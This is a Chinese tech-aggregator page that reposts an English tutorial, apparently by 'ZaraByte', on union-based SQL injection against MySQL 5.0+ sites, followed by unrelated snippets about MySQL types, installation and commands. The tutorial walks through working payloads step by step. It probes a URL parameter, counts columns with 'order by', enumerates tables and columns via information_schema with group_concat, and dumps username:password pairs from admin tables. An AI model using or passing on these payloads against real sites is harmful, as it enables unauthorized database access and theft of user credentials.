易截截图软件、单文件、免安装、纯绿色、仅160KB

[Injection]对MYSQL 5.0服务器以上版本注入


by ZaraByte
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
This selects all the the tables from the database.
7. Find a table your after like admin or like users or user whatever table you wanna see
8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–
Replace x with the ASCII of table name You will need to convert Text to ASCII.
9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–
Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after
so for example say you found a table named admin and you wanna see the username and password columns you’d do
union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–
Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them


相关文档:

MySQL与Oracle数据类型转换


MySQL Data Type
Oracle Data Type
BIGINT
NUMBER(19, 0)
BIT
RAW
BLOB
BLOB, RAW
CHAR
CHAR
DATE
DATE
DATETIME
DATE
DECIMAL
FLOAT (24)
DOUBLE
FLOAT (24)
DOUBLE PRECISION
FLOAT (24)
ENUM
VARCHAR2
FLOAT
FLOAT
INT
NUMBER(10, 0)
INTEGER
NUMBER(10, 0)
LONGBLOB
BLOB, RAW
LONGTEX ......

linux mysql 开发环境

安装mysql
sudo apt-get install mysql-servel-5.0 mysql-client-5.0
下载安装过程中,会提示输入root密码
安装C语言编程接口:
 sudo apt-get install libmysqlclient15-dev
更多api 查看:http://dev.mysql.com/doc/refman/5.0/en/c.html
相关mysql头文件和库文件安装在/usr/include/mysql/和/usr/lib/mysql目 ......

mysql 5.0总结偷得


mysql 5.0存储过程学习总结
一.创建存储过程
1.基本语法:
create procedure sp_name()
begin
………
end
2.参数传递
二.调用存储过程
1.基本语法:call sp_name()
注意:存储过程名称后面必须加括号,哪怕该存储过程没有参数传递
三.删除存储过程
1.基本语法:
drop procedure sp_name// ......

MySQL命令

1.连接MySQL数据库
echo on  
cd c:\Program Files\MySQL\MySQL Server 5.2\bin
mysql -uroot -ppass
2、显示数据库列表。
show databases;
3、显示库中的数据表:
use mysql; //打开库,
show tables;
4、显示数据表的结构:
describe 表名;
5、建库:
create database 库名;
6、建表:
use 库名;
creat ......
© 2009 ej38.com All Rights Reserved. 关于E健网联系我们 | 站点地图 | 赣ICP备09004571号